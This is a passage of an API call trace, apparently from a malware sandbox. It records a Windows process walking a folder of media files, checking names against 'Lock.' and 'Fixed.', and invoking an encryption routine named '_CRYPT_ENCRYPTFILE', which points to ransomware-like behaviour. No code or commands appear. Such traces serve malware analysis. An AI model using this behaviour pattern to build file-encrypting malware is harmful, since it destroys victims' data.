dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.678] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.678] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0243.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0243.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.678] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0243.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.679] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0243.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.679] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63b00, ftCreationTime.dwHighDateTime=0x1d5e891, ftLastAccessTime.dwLowDateTime=0x4166dab0, ftLastAccessTime.dwHighDateTime=0x1d5eea2, ftLastWriteTime.dwLowDateTime=0x4166dab0, ftLastWriteTime.dwHighDateTime=0x1d5eea2, nFileSizeHigh=0x0, nFileSizeLow=0x10d6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0 iAXcBYZXSdt.wav", cAlternateFileName="J0IAXC~1.WAV")) returned 1 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0243.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.679] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0243.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.680] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0243.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0243.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.680] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0243.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0243.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978490 [0243.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e280 | out: hHeap=0x970000) returned 1 [0243.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0243.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.681] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0243.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.681] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.681] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc85340e0, ftCreationTime.dwHighDateTime=0x1d5e6eb, ftLastAccessTime.dwLowDateTime=0x738e2d90, ftLastAccessTime.dwHighDateTime=0x1d5e92f, ftLastWriteTime.dwLowDateTime=0x738e2d90, ftLastWriteTime.dwHighDateTime=0x1d5e92f, nFileSizeHigh=0x0, nFileSizeLow=0x103c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="n2lzfQolvCVgNf.m4a", cAlternateFileName="N2LZFQ~1.M4A")) returned 1 [0243.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0243.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0243.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0243.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.693] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.693] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0243.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0243.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.694] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0243.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0243.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0243.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.694] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.694] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.695] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf78c4360, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0xa8983f30, ftLastAccessTime.dwHighDateTime=0x1d5ef5b, ftLastWriteTime.dwLowDateTime=0xa8983f30, ftLastWriteTime.dwHighDateTime=0x1d5ef5b, nFileSizeHigh=0x0, nFileSizeLow=0xa0af, dwReserved0=0x0, dwReserved1=0x0, cFileName="psWdx1ftUz7.m4a", cAlternateFileName="PSWDX1~1.M4A")) returned 1 [0243.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0243.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0243.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0243.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0243.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.695] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0243.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.695] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0243.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0243.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.696] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0243.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0243.696] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.697] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.697] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd5fe470, ftCreationTime.dwHighDateTime=0x1d5f0b6, ftLastAccessTime.dwLowDateTime=0x6bc86c70, ftLastAccessTime.dwHighDateTime=0x1d5e5eb, ftLastWriteTime.dwLowDateTime=0x6bc86c70, ftLastWriteTime.dwHighDateTime=0x1d5e5eb, nFileSizeHigh=0x0, nFileSizeLow=0x1565c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDmw5DGaT83 YD.mp3", cAlternateFileName="RDMW5D~1.MP3")) returned 1 [0243.697] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.697] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.697] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.697] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.697] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.697] FindNextFileW (in: hFindFile=0xa86f90, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="踚@锴\x97\x8c蘔J㳻@腸J\x8c\x8c㵶@\x8c\x8c藴Ja")) returned 0 [0243.698] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.698] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.698] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0243.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0243.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.699] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.699] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0243.699] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.699] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.699] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DePu.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0243.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePu.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0243.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pu.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0243.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0243.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0243.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0243.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DePu.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0243.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ePu.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0243.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pu.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0243.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0243.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.701] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0243.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0243.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.701] 